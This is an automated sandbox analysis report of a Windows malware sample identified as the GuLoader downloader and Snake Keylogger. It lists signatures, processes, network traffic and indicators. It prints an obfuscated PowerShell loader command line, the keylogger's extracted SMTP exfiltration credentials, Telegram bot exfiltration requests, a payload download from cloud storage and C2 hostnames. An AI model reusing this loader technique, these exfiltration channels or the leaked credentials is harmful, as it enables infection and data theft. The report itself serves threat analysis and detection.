Edit tour

Windows Analysis Report
p7wgyD3kbI.exe

Overview

General Information

Sample name:	p7wgyD3kbI.exe renamed because original name is a hash value
Original sample name:	78d47e02882dfb44f115b607455f764fa88edbdb816d1fad3a7be9154b000de8.exe
Analysis ID:	1634888
MD5:	a6a8e7567d7a67b430a3cb5a67f53eb4
SHA1:	f509ab3433a98dbfc775ccebabb8c6c3f57abf69
SHA256:	78d47e02882dfb44f115b607455f764fa88edbdb816d1fad3a7be9154b000de8
Tags:	exeVIPKeyloggeruser-adrian__luca
Infos:

Detection

GuLoader, Snake Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Early bird code injection technique detected

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected GuLoader

Yara detected Snake Keylogger

Yara detected Telegram RAT

AI detected suspicious PE digital signature

Found suspicious powershell code related to unpacking or dynamic code loading

Hides threads from debuggers

Loading BitLocker PowerShell Module

Powershell drops PE file

Queues an APC in another process (thread injection)

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Msiexec Initiated Connection

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

p7wgyD3kbI.exe (PID: 5324 cmdline: "C:\Users\user\Desktop\p7wgyD3kbI.exe" MD5: A6A8E7567D7A67B430A3CB5A67F53EB4)

powershell.exe (PID: 7368 cmdline: "powershell.exe" -windowstyle minimized "$Vrimlenes=gc -Raw 'C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\udrring.Pro';$Pilleriet=$Vrimlenes.SubString(52498,3);.$Pilleriet($Vrimlenes)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 7736 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-usering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "manusevialup@sevialup.es", "Password": "Manu2020@", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000000B.00000002.2553419918.0000000021381000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000008.00000002.1685806414.000000000A057000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: msiexec.exe PID: 7736	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: msiexec.exe PID: 7736	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security

Sigma Signatures

System Summary

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 142.250.181.238, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7736, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 58065

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7368, TargetFilename: C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Supawn\Unbeholden\p7wgyD3kbI.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle minimized "$Vrimlenes=gc -Raw 'C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\udrring.Pro';$Pilleriet=$Vrimlenes.SubString(52498,3);.$Pilleriet($Vrimlenes)", CommandLine: "powershell.exe" -windowstyle minimized "$Vrimlenes=gc -Raw 'C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\udrring.Pro';$Pilleriet=$Vrimlenes.SubString(52498,3);.$Pilleriet($Vrimlenes)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\p7wgyD3kbI.exe", ParentImage: C:\Users\user\Desktop\p7wgyD3kbI.exe, ParentProcessId: 5324, ParentProcessName: p7wgyD3kbI.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Vrimlenes=gc -Raw 'C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\udrring.Pro';$Pilleriet=$Vrimlenes.SubString(52498,3);.$Pilleriet($Vrimlenes)", ProcessId: 7368, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-11T06:20:49.851893+0100	2803305	3	Unknown Traffic	192.168.2.6	58070	104.21.112.1	443	TCP
2025-03-11T06:20:53.113727+0100	2803305	3	Unknown Traffic	192.168.2.6	58072	104.21.112.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-11T06:20:44.672096+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	58068	193.122.6.168	80	TCP
2025-03-11T06:20:47.406498+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	58068	193.122.6.168	80	TCP
2025-03-11T06:20:50.569641+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	58071	193.122.6.168	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-11T06:20:36.849477+0100	2803270	2	Potentially Bad Traffic	192.168.2.6	58065	142.250.181.238	443	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-11T06:21:16.061307+0100	1810007	1	Potentially Bad Traffic	192.168.2.6	58086	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: p7wgyD3kbI.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Supawn\Unbeholden\p7wgyD3kbI.exe

Avira: detection malicious, Label: TR/Injector.pdwvk

Found malware configuration

Source: 0000000B.00000002.2553419918.0000000021381000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "manusevialup@sevialup.es", "Password": "Manu2020@", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Supawn\Unbeholden\p7wgyD3kbI.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Supawn\Unbeholden\p7wgyD3kbI.exe	Virustotal: Detection: 69%			Perma Link

Multi AV Scanner detection for submitted file

Source: p7wgyD3kbI.exe	Virustotal: Detection: 69%			Perma Link
Source: p7wgyD3kbI.exe	ReversingLabs: Detection: 50%

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: p7wgyD3kbI.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:58069 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.6:58065 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.6:58067 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:58086 version: TLS 1.2

Source: p7wgyD3kbI.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\p7wgyD3kbI.exe	Code function: 1_2_00406739 FindFirstFileW,FindClose,	1_2_00406739
Source: C:\Users\user\Desktop\p7wgyD3kbI.exe	Code function: 1_2_00405AED GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	1_2_00405AED
Source: C:\Users\user\Desktop\p7wgyD3kbI.exe	Code function: 1_2_00402902 FindFirstFileW,	1_2_00402902

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2120F45Dh	11_2_2120F2C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2120F45Dh	11_2_2120F4AC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2120FC19h	11_2_2120F974
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23B8EA79h	11_2_23B8E7D0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23B80D0Dh	11_2_23B80B30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23B816F8h	11_2_23B80B30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23B8E1C9h	11_2_23B8DF20
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23B8E621h	11_2_23B8E378
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23B82D41h	11_2_23B82A90
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23B83308h	11_2_23B82EF0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23B83308h	11_2_23B82EEA
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23B8DD71h	11_2_23B8DAC8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23B83308h	11_2_23B83236
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23B8D4C1h	11_2_23B8D218
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23B8D919h	11_2_23B8D670
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23B8D069h	11_2_23B8CDC0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23B8FBD9h	11_2_23B8F930
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23B8F329h	11_2_23B8F080
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23B8F781h	11_2_23B8F4D8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23B8EED1h	11_2_23B8EC28
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	11_2_23B80040

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:58086 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic

TCP traffic: 192.168.2.6:58059 -> 162.159.36.2:53

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:783875%0D%0ADate%20and%20Time:%2012/03/2025%20/%2008:55:50%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20783875%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox View	IP Address: 193.122.6.168 193.122.6.168

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:58071 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:58068 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:58072 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:58070 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:58065 -> 142.250.181.238:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RCW4SkvPganO7AWnA0JtNK7xu8uGwd2M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1RCW4SkvPganO7AWnA0JtNK7xu8uGwd2M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:58069 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RCW4SkvPganO7AWnA0JtNK7xu8uGwd2M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1RCW4SkvPganO7AWnA0JtNK7xu8uGwd2M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:783875%0D%0ADate%20and%20Time:%2012/03/2025%20/%2008:55:50%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20783875%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: 197.87.175.4.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 11 Mar 2025 05:21:15 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: msiexec.exe, 0000000B.00000002.2553419918.0000000021381000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: msiexec.exe, 0000000B.00000002.2553419918.0000000021381000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: msiexec.exe, 0000000B.00000002.2553419918.0000000021381000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: msiexec.exe, 0000000B.00000002.2553419918.0000000021381000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: p7wgyD3kbI.exe, p7wgyD3kbI.exe.8.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000008.00000002.1676912283.00000000062DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000008.00000002.1673536791.00000000053C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.1673536791.00000000053C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000008.00000002.1673536791.0000000005271000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2553419918.0000000021381000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.1673536791.00000000053C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: msiexec.exe, 0000000B.00000002.2553419918.0000000021381000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: powershell.exe, 00000008.00000002.1673536791.00000000053C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000008.00000002.1682852927.00000000089FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
Source: msiexec.exe, 0000000B.00000002.2555779773.000000002265B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: powershell.exe, 00000008.00000002.1673536791.0000000005271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000008.00000002.1673536791.00000000053C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: msiexec.exe, 0000000B.00000002.2553419918.0000000021465000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: msiexec.exe, 0000000B.00000002.2553419918.0000000021465000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: msiexec.exe, 0000000B.00000002.2553419918.0000000021465000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: msiexec.exe, 0000000B.00000002.2553419918.0000000021465000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:783875%0D%0ADate%20a
